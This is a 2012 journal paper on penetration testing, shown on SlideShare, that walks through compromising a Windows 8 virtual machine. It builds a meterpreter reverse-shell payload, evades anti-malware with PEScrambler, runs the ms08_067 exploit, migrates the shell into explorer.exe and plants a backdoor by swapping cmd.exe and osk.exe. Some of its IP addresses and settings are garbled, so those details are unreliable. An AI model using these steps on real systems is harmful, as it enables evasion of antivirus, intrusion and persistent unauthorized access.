SlideShare a Scribd company logo
1 of 4
Download to read offline
IOSR Journal of Computer Engineering (IOSRJCE)
ISSN: 2278-0661, ISBN: 2278-8727 Volume 5, Issue 6 (Sep-Oct. 2012), PP 01-04
www.iosrjournals.org
www.iosrjournals.org 1 | Page
Compromising windows 8 with metasploit’s exploit
1
Monika Pangaria, 2
Vivek Shrivastava, 3
Priyanka Soni
1
M.Tech (I.T.) Student,I.T.M. College, 2
Asst. Prof. (I.T.), I.T.M. College, 3
M.Tech.(I.T.) ,Student Banasthali
Vidyapeeth
Abstract: Windows 8, the latest operating system by Microsoft will be launching soon in October 2012. It is
designed and developed for use of desktops, laptops, tablets and home theatre PC’s as well.
Pentesting – It is a process to simulate all the possible notorious ways used by hackers to breach a
system’s security. But on the contrary it is purely ethical in deed so as to know in advance how a machine can
suffer security circumvention attack.
The main motto of this paper is to compromise a system with windows 8 OS. This pentest breach the
Anti malware protection process. Using metasploit expoit ms08_067_netapi and meterpreter payload
windows/meterpreter/reverse_tcp we get our goal.
The thing to be bothered about is meterpreter payload can now be encountered by Anti-Viruses. And
spotlight in windows 8 Anti Malware Protection perform icing on a cake. We do condone this spotlight in our
experiment using PEScrambler.
Keywords: Penetration Testing, Exploit, Payload, FUD(fully undetectable).
I. Introduction
Penetration Testing is a conduct implicates assimilation of deeds used by hackers to rupture
enterprise‟s security[9]. Windows 8, is ameliorating esteem among people at an exponential rate. So by the
couple of months it will be installed on millions of desktops, laptops, tablets. This paper encircle all the efforts
done in penetrating into machine having windows 8.
The tools we have used in this context are Metasploit Framework 3.0, nmap, PEscrambler.
II. Concept
Fig.1 shows the hypothesis behind Penetration Testing.
Fig. 1 Penetration Testing Process
Here, computer A is supposed to be a victim of computer B. First a union of exploit + payload is
injected into a victim‟s computer [1].Then exploit comes into work, payloads commences its attack process only
if an exploit get its desired acquirement.
Once an exploit entretched, a reverse connection is established. Now, a time for action, we can procure
dominance like data registry read/write operations , uploading and downloading, taking snapshots, process
migration, key strokes scan and much more to do. Once the desired tasks are amassed we can raise the bar for
privelege escalation.
III. Experiment
Aim : Compromising window 8 with Metasploit‟s exploit.
Experiment Setup: Creating a virtual lab having following stuff. They are
1. Vmware Workstation 9.0
2. Windows 8 consumer preview 64 bit
3. Backtrack 5 R1 (Linux based OS)
•Payload
run if
exploit
succeed
•Reverse
connecti
on
•Exploit
runs
•Exploit+
Payload
1 2
34
Compromising Windows 8 With Metasploit’s Exploit
www.iosrjournals.org 2 | Page
4. PEScrambler _v0_1
Process :
1. Intelligence Gathering and Vulnerability Scanning[3] -
It acquires target knowledge and made foundation of pentest without revealing attacker‟s presence and its
desires. It is the most cardinal step of penetration test as it supplies a base for it. The tool availed by us for port
scanning is NMAP. For scanning selective range of IP Addresses we do this with a command
root@bt:~# Nmap 192.168.129.*
This will assemble all the information like state of host, closed ports, open ports. We get the following result for
our target 192.168.129.133
root@bt:~# 192.468.129.133
Nmap scan report for 172.168.129.133
Host is up (0.00078s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
554/tcp open rtsp
2869/tcpopen icslap
5357/tcpopen wsdapi
10243/tcp open unknown
MAC Address 00:0C:29:14:9A:EF (vmware)
Nmap done: 1 IP address (1 host up) scanned in 19.40 seconds
2. Making .exe payload
Next step is to make an exe file clutching payload within.
root@bt: /# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.129.128 LPORT 4444 x >
/root/test.exe
The outcome test.exe will be placed in root folder. Now its time for bustle, But afore we do this,
crucial point that may perturbed is MALWARE PROTECTION PROCESS inbuilt in windows 8. When we load
this file in windows 8 running machine it will be detected. So two ways to get eradicated from this :
1. Either attenuate Malware Protection Process.
2. Or beget this exe FUD (fully undetectable).
3. FUD Construction –
Any Anti-Virus program or Anti-Malware program disclose virus through a special virus signature that sizes 1
Byte. PEScrambler works solely on windows platform. So once payload is contrived in backtrack, load it into
windows machine. Let see how it works[8] ?
- Copy the payload in same directory in which PEScrambler is located.
- Type the following command in cmd window and do not disremember to change directory to
PEScrambler folder.
Using command-
PEScrambler.exe -i test.exe –o undetectable.exe
- Now It‟s utterly encoded. It will not be pinpointed by Anti Malware Protection mechanism inbuilt with
Windows 8
4. Exploitation –
Exploits are deleterious code that runs against loopholes or vulnerabilities that we earlier determined in
penetration test stages.
Exploits execute within msfconsole[4].
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD -> windows/meterpreter/reverse_tcp
msf exploit (handler) > set RHOST 192.168.129.128
RHOST -> 192.168.129.128
msf exploit (handler) > set LHOST 192.168.129.128
LHOST -> 192.168.129.128
msf exploit (handler) > set LPORT 4444
Compromising Windows 8 With Metasploit’s Exploit
www.iosrjournals.org 3 | Page
LPORT -> 4444
msf exploit (handler) > exploit
[*] Started reverse handler on 192.168.129.128
[*] Starting the payload handler
[*] Sending stage (752128 bytes) to 192.168.129.133
[*] Meterpreter session 1 opened (192.168.129.128:4444 -> 192.168.129.133:49168) at 2012-08-30 23:55:57
+0530
meterpreter >
Here we got meterpreter session!!!
5. Meterpreter
Once we reach meterpreter session, we can exploit in any way we want. Lets build a backdoor using eterpreter.
Now get the current process identifier[5].
meterpreter > getpid
Current pid : 3632
Now see which pid is this by using command „ps‟.
meterpreter > ps
It will result in following
PID 3632
Name test.exe
Arch x86
Session1
User win/Monika
Path
C:UsersMonikaDesktoptest.exe
Now to change our pid we must migrate to another process.To see list of processes running on target
meterpreter > ps
Search for explorer.exe
PID 2512
Name explorer.exe
Arch x86
Session 1
User win/Monika
Path
C:Windowsexplorer.exe
Now migrate to this process[7].
meterpreter >migrate 2512
[*] Migrating to 2512
[*] Migration completed successfully.
Now again check pid
meterpreter >getpid
Current Identifier : 2512
Now inquiry system info
meterpreter > sysinfo
Computer : WIN
Os : Windows 8
Architecture : x64
System Language: en_US
Meterpreter : x64/win64
Now the terminal step is to access C Drive[8].
meterpreter > shell
Process 1632 created.
Channel 1 created.
Microsoft Windows [Version 6.2.8250]
© 2012 Microsoft Corporation All Rights Reserved.
C:UsersMonikaDesktop>cd
Compromising Windows 8 With Metasploit’s Exploit
www.iosrjournals.org 4 | Page
C:>cd Windows/System32
C:WindowsSystem32>
Once we get into system32 folder. Simply rename cmd.exe as osk.exe and osk.exe as cmd.exe. This
will open a backdoor. Whenever we wish to access that system no entrance fee is required[6]. When it buzz for
password, press Shift Key 5 times, you will get an instance of explorer.exe and machine is being compromised.
IV. Future Scope And Conclusion
Future Scope:
In future, patches should be made in order to prevent these exploits breaching security. The
performance of this penetration test can be enhanced by using Core Impact with Metasploit Framework.
Conclusion:
To be concluded, yet windows 8 is accomodated with wide level security and an impression behind it
was to oppress all those exasperating creeps. It demands to be more secure and steadfast so that not even single
exploit can convince it be compromised.
References
[1] Bing Duan "An Easy-to-Deploy Penetration Testing Platform." Young Computer Scientists, 2008. ICYCS 2008. The 9th
International Conference for Date : 18-21 Nov. 2008 Page(s): 2314 – 2318.
[2] Bechtsoudis, A. "Aiming at Higher Network Security through Extensive Penetration Tests". Latin America Transactions, IEEE
(Revista IEEE America Latina) April 2012 Volume: 10 , Issue: 3 Page(s): 1752 - 1756
[3] Turpe, S. "Common Precautions in Penetration Testing." Academic and Industrial Conference - Practice and Research Techniques,
2009. TAIC PART '09. Date : 4-6 Sept. 2009. Page(s): 205 - 209
[4] “Metasploit: The Penetration Tester's Guide” By David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharon. ISBN-10: 1-59327-
288-X.
[5] “Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research” By David Maynor, K.K.Mookhey,
Jacopo Cervini, Fairuzan Roslan, Kevin Bewer. ISBN 13: 978-1-59749-074-0. By Syngress Publishing Inc.
[6] Sankalp Singh "Fast Model Based Penetration Testing". Simulation Conference, 2004. Proceedings of the 2004 Winter Date : 5-8
Dec. 2004. Volume 1 Page(s): 2314 – 2318.
[7] Bishop M. “About Penetration Testing". Security and privacy IEEE Nov-Dec 2007. Volume 5 Page(s): 84 – 87.
[8] http://kerelacyberforce.in/making-your-executable-undetectable-with-pescrambler
[9] Robinson, S. “Art of Penetration Testing” Security of Distributed Control Systems, 2005. The IEEE Seminar on Date : 2 Nov. 2005.

More Related Content

What's hot

Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackAjinkya Nikam
 
Stuxnet - More then a virus.
Stuxnet - More then a virus.Stuxnet - More then a virus.
Stuxnet - More then a virus.Hardeep Bhurji
 
Automated defense from rootkit attacks
Automated defense from rootkit attacksAutomated defense from rootkit attacks
Automated defense from rootkit attacksUltraUploader
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitRaghav Bisht
 
Shusei tomonaga pac_sec_20171026
Shusei tomonaga pac_sec_20171026Shusei tomonaga pac_sec_20171026
Shusei tomonaga pac_sec_20171026PacSecJP
 
UEFI Firmware Rootkits: Myths and Reality
UEFI Firmware Rootkits: Myths and RealityUEFI Firmware Rootkits: Myths and Reality
UEFI Firmware Rootkits: Myths and RealitySally Feller
 
Csw2016 julien moinard-hardsploit
Csw2016 julien moinard-hardsploitCsw2016 julien moinard-hardsploit
Csw2016 julien moinard-hardsploitCanSecWest
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploitAashish R
 
Metasploit
MetasploitMetasploit
Metasploitninguna
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminarhenelpj
 
Mission Critical Security in a Post-Stuxnet World Part 2
Mission Critical Security in a Post-Stuxnet World Part 2Mission Critical Security in a Post-Stuxnet World Part 2
Mission Critical Security in a Post-Stuxnet World Part 2Byres Security Inc.
 
The World's First Cyber Weapon - Stuxnet
The World's First Cyber Weapon - StuxnetThe World's First Cyber Weapon - Stuxnet
The World's First Cyber Weapon - StuxnetSean Xie
 
Stuxnet - A weapon of the future
Stuxnet - A weapon of the futureStuxnet - A weapon of the future
Stuxnet - A weapon of the futureHardeep Bhurji
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 

What's hot (20)

Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attack
 
Stuxnet - More then a virus.
Stuxnet - More then a virus.Stuxnet - More then a virus.
Stuxnet - More then a virus.
 
Automated defense from rootkit attacks
Automated defense from rootkit attacksAutomated defense from rootkit attacks
Automated defense from rootkit attacks
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
 
Shusei tomonaga pac_sec_20171026
Shusei tomonaga pac_sec_20171026Shusei tomonaga pac_sec_20171026
Shusei tomonaga pac_sec_20171026
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
UEFI Firmware Rootkits: Myths and Reality
UEFI Firmware Rootkits: Myths and RealityUEFI Firmware Rootkits: Myths and Reality
UEFI Firmware Rootkits: Myths and Reality
 
Csw2016 julien moinard-hardsploit
Csw2016 julien moinard-hardsploitCsw2016 julien moinard-hardsploit
Csw2016 julien moinard-hardsploit
 
Pentesting with Metasploit
Pentesting with MetasploitPentesting with Metasploit
Pentesting with Metasploit
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
 
Metasploit
MetasploitMetasploit
Metasploit
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
Stuxnet worm
Stuxnet wormStuxnet worm
Stuxnet worm
 
Mission Critical Security in a Post-Stuxnet World Part 2
Mission Critical Security in a Post-Stuxnet World Part 2Mission Critical Security in a Post-Stuxnet World Part 2
Mission Critical Security in a Post-Stuxnet World Part 2
 
The World's First Cyber Weapon - Stuxnet
The World's First Cyber Weapon - StuxnetThe World's First Cyber Weapon - Stuxnet
The World's First Cyber Weapon - Stuxnet
 
Stuxnet - A weapon of the future
Stuxnet - A weapon of the futureStuxnet - A weapon of the future
Stuxnet - A weapon of the future
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
 

Viewers also liked

International Medical Careers Forum Oct 15 2016 Sharing My Own Trip Dr Ameed ...
International Medical Careers Forum Oct 15 2016 Sharing My Own Trip Dr Ameed ...International Medical Careers Forum Oct 15 2016 Sharing My Own Trip Dr Ameed ...
International Medical Careers Forum Oct 15 2016 Sharing My Own Trip Dr Ameed ...Odyssey Recruitment
 
Proyecto ingles
Proyecto inglesProyecto ingles
Proyecto inglesleidy
 
5 tips for perfect presentations
5 tips for perfect presentations5 tips for perfect presentations
5 tips for perfect presentationsBernd Allgeier
 
An Explanatory Analysis of the Economic and Social Impact of Corruption in Zi...
An Explanatory Analysis of the Economic and Social Impact of Corruption in Zi...An Explanatory Analysis of the Economic and Social Impact of Corruption in Zi...
An Explanatory Analysis of the Economic and Social Impact of Corruption in Zi...IOSR Journals
 
Zinc Sulfate As a Growth Disruptor for Spodoptera littoralis With Reference t...
Zinc Sulfate As a Growth Disruptor for Spodoptera littoralis With Reference t...Zinc Sulfate As a Growth Disruptor for Spodoptera littoralis With Reference t...
Zinc Sulfate As a Growth Disruptor for Spodoptera littoralis With Reference t...IOSR Journals
 
A Novel Approach for Tracking with Implicit Video Shot Detection
A Novel Approach for Tracking with Implicit Video Shot DetectionA Novel Approach for Tracking with Implicit Video Shot Detection
A Novel Approach for Tracking with Implicit Video Shot DetectionIOSR Journals
 
Area-Efficient VLSI Implementation for Parallel Linear-Phase FIR Digital Filt...
Area-Efficient VLSI Implementation for Parallel Linear-Phase FIR Digital Filt...Area-Efficient VLSI Implementation for Parallel Linear-Phase FIR Digital Filt...
Area-Efficient VLSI Implementation for Parallel Linear-Phase FIR Digital Filt...IOSR Journals
 
Seminar curriculumppt
Seminar curriculumpptSeminar curriculumppt
Seminar curriculumpptcpennello
 
Comparison Study of Lossless Data Compression Algorithms for Text Data
Comparison Study of Lossless Data Compression Algorithms for Text DataComparison Study of Lossless Data Compression Algorithms for Text Data
Comparison Study of Lossless Data Compression Algorithms for Text DataIOSR Journals
 
Capacitive voltage and current induction phenomena in GIS substation
Capacitive voltage and current induction phenomena in GIS substationCapacitive voltage and current induction phenomena in GIS substation
Capacitive voltage and current induction phenomena in GIS substationIOSR Journals
 
Detection of Malignancy in Digital Mammograms from Segmented Breast Region Us...
Detection of Malignancy in Digital Mammograms from Segmented Breast Region Us...Detection of Malignancy in Digital Mammograms from Segmented Breast Region Us...
Detection of Malignancy in Digital Mammograms from Segmented Breast Region Us...IOSR Journals
 
How To Create Your Own Info Product
How To Create Your Own Info ProductHow To Create Your Own Info Product
How To Create Your Own Info Productbelieve52
 
Low Voltage Energy Harvesting by an Efficient AC-DC Step-Up Converter
Low Voltage Energy Harvesting by an Efficient AC-DC Step-Up ConverterLow Voltage Energy Harvesting by an Efficient AC-DC Step-Up Converter
Low Voltage Energy Harvesting by an Efficient AC-DC Step-Up ConverterIOSR Journals
 
Modeling and Application of a Modified Attributional Psychometric Instrument...
Modeling and Application of a Modified Attributional  Psychometric Instrument...Modeling and Application of a Modified Attributional  Psychometric Instrument...
Modeling and Application of a Modified Attributional Psychometric Instrument...IOSR Journals
 
Almentariak hodei ehiztari
Almentariak hodei ehiztariAlmentariak hodei ehiztari
Almentariak hodei ehiztariAlmentariak
 

Viewers also liked (20)

International Medical Careers Forum Oct 15 2016 Sharing My Own Trip Dr Ameed ...
International Medical Careers Forum Oct 15 2016 Sharing My Own Trip Dr Ameed ...International Medical Careers Forum Oct 15 2016 Sharing My Own Trip Dr Ameed ...
International Medical Careers Forum Oct 15 2016 Sharing My Own Trip Dr Ameed ...
 
Proyecto ingles
Proyecto inglesProyecto ingles
Proyecto ingles
 
5 tips for perfect presentations
5 tips for perfect presentations5 tips for perfect presentations
5 tips for perfect presentations
 
F0344451
F0344451F0344451
F0344451
 
An Explanatory Analysis of the Economic and Social Impact of Corruption in Zi...
An Explanatory Analysis of the Economic and Social Impact of Corruption in Zi...An Explanatory Analysis of the Economic and Social Impact of Corruption in Zi...
An Explanatory Analysis of the Economic and Social Impact of Corruption in Zi...
 
Zinc Sulfate As a Growth Disruptor for Spodoptera littoralis With Reference t...
Zinc Sulfate As a Growth Disruptor for Spodoptera littoralis With Reference t...Zinc Sulfate As a Growth Disruptor for Spodoptera littoralis With Reference t...
Zinc Sulfate As a Growth Disruptor for Spodoptera littoralis With Reference t...
 
A Novel Approach for Tracking with Implicit Video Shot Detection
A Novel Approach for Tracking with Implicit Video Shot DetectionA Novel Approach for Tracking with Implicit Video Shot Detection
A Novel Approach for Tracking with Implicit Video Shot Detection
 
Area-Efficient VLSI Implementation for Parallel Linear-Phase FIR Digital Filt...
Area-Efficient VLSI Implementation for Parallel Linear-Phase FIR Digital Filt...Area-Efficient VLSI Implementation for Parallel Linear-Phase FIR Digital Filt...
Area-Efficient VLSI Implementation for Parallel Linear-Phase FIR Digital Filt...
 
Seminar curriculumppt
Seminar curriculumpptSeminar curriculumppt
Seminar curriculumppt
 
Comparison Study of Lossless Data Compression Algorithms for Text Data
Comparison Study of Lossless Data Compression Algorithms for Text DataComparison Study of Lossless Data Compression Algorithms for Text Data
Comparison Study of Lossless Data Compression Algorithms for Text Data
 
Capacitive voltage and current induction phenomena in GIS substation
Capacitive voltage and current induction phenomena in GIS substationCapacitive voltage and current induction phenomena in GIS substation
Capacitive voltage and current induction phenomena in GIS substation
 
Detection of Malignancy in Digital Mammograms from Segmented Breast Region Us...
Detection of Malignancy in Digital Mammograms from Segmented Breast Region Us...Detection of Malignancy in Digital Mammograms from Segmented Breast Region Us...
Detection of Malignancy in Digital Mammograms from Segmented Breast Region Us...
 
Tattoos designs gallery
Tattoos designs galleryTattoos designs gallery
Tattoos designs gallery
 
E0561719
E0561719E0561719
E0561719
 
I0315257
I0315257I0315257
I0315257
 
How To Create Your Own Info Product
How To Create Your Own Info ProductHow To Create Your Own Info Product
How To Create Your Own Info Product
 
Low Voltage Energy Harvesting by an Efficient AC-DC Step-Up Converter
Low Voltage Energy Harvesting by an Efficient AC-DC Step-Up ConverterLow Voltage Energy Harvesting by an Efficient AC-DC Step-Up Converter
Low Voltage Energy Harvesting by an Efficient AC-DC Step-Up Converter
 
Modeling and Application of a Modified Attributional Psychometric Instrument...
Modeling and Application of a Modified Attributional  Psychometric Instrument...Modeling and Application of a Modified Attributional  Psychometric Instrument...
Modeling and Application of a Modified Attributional Psychometric Instrument...
 
Audition
AuditionAudition
Audition
 
Almentariak hodei ehiztari
Almentariak hodei ehiztariAlmentariak hodei ehiztari
Almentariak hodei ehiztari
 

Similar to Compromising windows 8 with metasploit’s exploit

Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesAmit Kumbhar
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network SecurityHarish Chaudhary
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS)        In t.docxLab-10 Malware Creation and Denial of Service (DoS)        In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
 
Malware freak show
Malware freak showMalware freak show
Malware freak showsr1nu
 
Virtual Machines Security Internals: Detection and Exploitation
 Virtual Machines Security Internals: Detection and Exploitation Virtual Machines Security Internals: Detection and Exploitation
Virtual Machines Security Internals: Detection and ExploitationMattia Salvi
 
Metasploit Computer security testing tool
Metasploit  Computer security testing toolMetasploit  Computer security testing tool
Metasploit Computer security testing toolmedoelkang600
 
Point of-sale-malware-backoff
Point of-sale-malware-backoffPoint of-sale-malware-backoff
Point of-sale-malware-backoffAndrey Apuhtin
 
Point of-sale-malware-backoff
Point of-sale-malware-backoffPoint of-sale-malware-backoff
Point of-sale-malware-backoffEMC
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
6 ways to hack your JavaScript application by Viktor Turskyi
6 ways to hack your JavaScript application by Viktor Turskyi   6 ways to hack your JavaScript application by Viktor Turskyi
6 ways to hack your JavaScript application by Viktor Turskyi OdessaJS Conf
 
Cloud Reliability: Decreasing outage frequency using fault injection
Cloud Reliability: Decreasing outage frequency using fault injectionCloud Reliability: Decreasing outage frequency using fault injection
Cloud Reliability: Decreasing outage frequency using fault injectionJorge Cardoso
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploitwozgeass
 
JS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложение
JS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложениеJS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложение
JS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложениеJSFestUA
 
IRJET- A Study on Penetration Testing using Metasploit Framework
IRJET- A Study on Penetration Testing using Metasploit FrameworkIRJET- A Study on Penetration Testing using Metasploit Framework
IRJET- A Study on Penetration Testing using Metasploit FrameworkIRJET Journal
 
Penetration testing using metasploit framework
Penetration testing using metasploit frameworkPenetration testing using metasploit framework
Penetration testing using metasploit frameworkPawanKesharwani
 
OWASP Top 10 Web Attacks (2017) with Prevention Methods
OWASP Top 10 Web Attacks (2017) with Prevention MethodsOWASP Top 10 Web Attacks (2017) with Prevention Methods
OWASP Top 10 Web Attacks (2017) with Prevention MethodsIRJET Journal
 

Similar to Compromising windows 8 with metasploit’s exploit (20)

Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS)        In t.docxLab-10 Malware Creation and Denial of Service (DoS)        In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
Malware Freak Show
Malware Freak ShowMalware Freak Show
Malware Freak Show
 
Malware freak show
Malware freak showMalware freak show
Malware freak show
 
STUXNET_
STUXNET_STUXNET_
STUXNET_
 
Virtual Machines Security Internals: Detection and Exploitation
 Virtual Machines Security Internals: Detection and Exploitation Virtual Machines Security Internals: Detection and Exploitation
Virtual Machines Security Internals: Detection and Exploitation
 
Metasploit Computer security testing tool
Metasploit  Computer security testing toolMetasploit  Computer security testing tool
Metasploit Computer security testing tool
 
Point of-sale-malware-backoff
Point of-sale-malware-backoffPoint of-sale-malware-backoff
Point of-sale-malware-backoff
 
Point of-sale-malware-backoff
Point of-sale-malware-backoffPoint of-sale-malware-backoff
Point of-sale-malware-backoff
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
6 ways to hack your JavaScript application by Viktor Turskyi
6 ways to hack your JavaScript application by Viktor Turskyi   6 ways to hack your JavaScript application by Viktor Turskyi
6 ways to hack your JavaScript application by Viktor Turskyi
 
Cloud Reliability: Decreasing outage frequency using fault injection
Cloud Reliability: Decreasing outage frequency using fault injectionCloud Reliability: Decreasing outage frequency using fault injection
Cloud Reliability: Decreasing outage frequency using fault injection
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
 
JS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложение
JS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложениеJS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложение
JS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложение
 
IRJET- A Study on Penetration Testing using Metasploit Framework
IRJET- A Study on Penetration Testing using Metasploit FrameworkIRJET- A Study on Penetration Testing using Metasploit Framework
IRJET- A Study on Penetration Testing using Metasploit Framework
 
Penetration testing using metasploit framework
Penetration testing using metasploit frameworkPenetration testing using metasploit framework
Penetration testing using metasploit framework
 
OWASP Top 10 Web Attacks (2017) with Prevention Methods
OWASP Top 10 Web Attacks (2017) with Prevention MethodsOWASP Top 10 Web Attacks (2017) with Prevention Methods
OWASP Top 10 Web Attacks (2017) with Prevention Methods
 

More from IOSR Journals (20)

A011140104
A011140104A011140104
A011140104
 
M0111397100
M0111397100M0111397100
M0111397100
 
L011138596
L011138596L011138596
L011138596
 
K011138084
K011138084K011138084
K011138084
 
J011137479
J011137479J011137479
J011137479
 
I011136673
I011136673I011136673
I011136673
 
G011134454
G011134454G011134454
G011134454
 
H011135565
H011135565H011135565
H011135565
 
F011134043
F011134043F011134043
F011134043
 
E011133639
E011133639E011133639
E011133639
 
D011132635
D011132635D011132635
D011132635
 
C011131925
C011131925C011131925
C011131925
 
B011130918
B011130918B011130918
B011130918
 
A011130108
A011130108A011130108
A011130108
 
I011125160
I011125160I011125160
I011125160
 
H011124050
H011124050H011124050
H011124050
 
G011123539
G011123539G011123539
G011123539
 
F011123134
F011123134F011123134
F011123134
 
E011122530
E011122530E011122530
E011122530
 
D011121524
D011121524D011121524
D011121524
 

Recently uploaded

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
